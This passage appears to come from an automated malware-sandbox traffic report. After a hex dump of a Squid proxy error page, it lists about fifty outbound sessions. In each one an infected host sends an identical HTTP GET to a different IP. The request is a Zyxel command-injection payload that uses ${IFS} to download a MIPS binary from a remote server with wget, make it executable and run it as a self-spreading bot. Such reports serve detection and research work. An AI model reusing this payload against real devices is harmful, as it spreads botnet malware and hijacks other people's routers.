                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 33 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 33 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2023 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2023 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;fon


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1174192.168.2.1446040201.31.62.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.149996042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1175192.168.2.1433100206.107.21.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150036097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1176192.168.2.1455054117.59.73.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150085926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1177192.168.2.1435460114.168.238.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150154114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1178192.168.2.1435940152.206.147.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150196075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1179192.168.2.1455388223.78.219.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150228024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1180192.168.2.1435544130.144.18.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150269985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1181192.168.2.143985014.149.221.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150300980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1182192.168.2.1448650160.47.205.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150325060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1183192.168.2.1449098197.58.111.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150363922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1184192.168.2.1443788104.250.207.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150414944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1185192.168.2.145216067.49.221.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150473118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1186192.168.2.143918412.140.125.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150501966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1187192.168.2.1448194106.246.93.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150528908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1188192.168.2.1437968192.248.9.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150571108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1189192.168.2.1442838195.100.76.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150618076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1190192.168.2.1452616190.44.73.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150656939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1191192.168.2.1460782178.169.162.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150697947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192192.168.2.144570838.65.227.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150727987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1193192.168.2.143533235.124.2.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150764942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1194192.168.2.1437648169.214.179.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150798082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1195192.168.2.145064623.103.0.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150849104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1196192.168.2.145333043.56.195.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150876045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1197192.168.2.1449270140.105.239.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150928020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1198192.168.2.1434568173.120.192.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.150981903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1199192.168.2.1440544130.121.36.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151020050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1200192.168.2.1444040147.125.72.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151060104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1201192.168.2.144971880.55.116.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151098967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1202192.168.2.144697412.78.199.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151123047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1203192.168.2.145991878.30.176.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151177883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1204192.168.2.145550886.222.131.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151221037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1205192.168.2.1445530147.65.65.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151252031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1206192.168.2.143468284.218.216.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151305914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1207192.168.2.1440518204.67.138.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151335955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1208192.168.2.1445620171.68.141.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151375055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1209192.168.2.145300284.209.171.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151396036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1210192.168.2.1448632146.64.80.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151429892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1211192.168.2.1436092196.132.243.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151483059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1212192.168.2.145021854.108.115.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151525974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1213192.168.2.144443298.182.175.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151552916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1214192.168.2.145301273.241.83.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151596069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1215192.168.2.145099877.154.83.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151621103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1216192.168.2.144785867.90.38.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151683092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1217192.168.2.144653494.29.192.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151722908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1218192.168.2.1437822171.181.170.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151751041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1219192.168.2.1435770159.64.93.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151806116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1220192.168.2.144620884.251.232.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151818991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1221192.168.2.143503073.205.195.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151851892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1222192.168.2.1449856211.52.1.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151916981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1223192.168.2.145711473.255.12.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.151942968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1224192.168.2.145765045.130.28.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.152000904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


